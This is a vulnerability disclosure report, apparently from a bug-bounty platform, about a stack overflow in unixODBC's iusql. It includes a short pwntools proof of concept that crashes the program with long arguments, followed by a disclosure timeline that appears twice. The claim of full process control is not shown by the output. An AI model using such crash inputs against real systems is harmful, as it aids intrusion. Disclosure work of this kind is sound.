classic overflow on the stack, with the ability to intercept control. in lurcher/unixodbc

Valid

Reported on

May 31st 2022

Description

if arguments longer than 1024 were passed to program iusql, we get a classic stack overflow.

Proof of Concept

I removed the docking check to reduce POC, this check did not show overflow protection

git clone https://github.com/lurcher/unixODBC.git 123
sed -i 's/^.*if ( .*phEnv, phDbc ) != SQL_SUCCESS/if(0/g' 123/exe/iusql.c

import os
os.environ['PWNLIB_NOTERM'] = '1'
os.environ['JUPYTER_DETECTED'] ='yes'
from pwn import *

a = ['A']*4
a[0] = '123/exe/iusql'
a[1] = cyclic(1024)
a[2] = cyclic(1024)
a[3] = cyclic(1024)

ex = process(argv=a)
ex.interactive()

[x] Starting local process '123/exe/iusql'
[+] Starting local process '123/exe/iusql': pid 25548
[*] Switching to interactive mode
*** buffer overflow detected ***: /content/123/exe/.libs/iusql terminated

Impact

when overflowing, control is seized, and the establishment of full control over the process

We are processing your report and will contact the lurcher/unixodbc team within 24 hours. 2 years ago

ihsinme modified the report

2 years ago

ihsinme modified the report

2 years ago

ihsinme submitted a

patch

2 years ago

We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 years ago

We have contacted a member of the lurcher/unixodbc team and are waiting to hear back a year ago

lurcher modified the Severity from High to Low a year ago

The researcher has received a minor penalty to their credibility for miscalculating the severity: -1

lurcher validated this vulnerability a year ago

ihsinme has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

lurcher marked this as fixed in 2.3.12pre with commit c6c547 a year ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

ihsinme

commented a year ago

Researcher

how can i see why the severity is lowered. in what criteria did I make a mistake. Thanks

ihsinme

commented a year ago

Researcher

good afternoon. in this report the developer fixed the level to LOW. but I can't figure out what stats it lowered. in the original rating was AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H how to see the current rating vector?

Jamie Slome

commented a year ago

Admin

Hello 👋 The maintainer has hard set the severity level to LOW irrespective of the vectors - i.e. they generally think that this has a low impact.

to join this conversation

We are processing your report and will contact the lurcher/unixodbc team within 24 hours. 2 years ago

ihsinme modified the report

2 years ago

ihsinme modified the report

2 years ago

ihsinme submitted a

patch

2 years ago

We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 years ago

We have contacted a member of the lurcher/unixodbc team and are waiting to hear back a year ago

lurcher modified the Severity from High to Low a year ago

The researcher has received a minor penalty to their credibility for miscalculating the severity: -1

lurcher validated this vulnerability a year ago

ihsinme has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

lurcher marked this as fixed in 2.3.12pre with commit c6c547 a year ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

ihsinme

commented a year ago

Researcher

how can i see why the severity is lowered. in what criteria did I make a mistake. Thanks

ihsinme

commented a year ago

Researcher

Jamie Slome

commented a year ago

Admin

Hello 👋 The maintainer has hard set the severity level to LOW irrespective of the vectors - i.e. they generally think that this has a low impact.

to join this conversation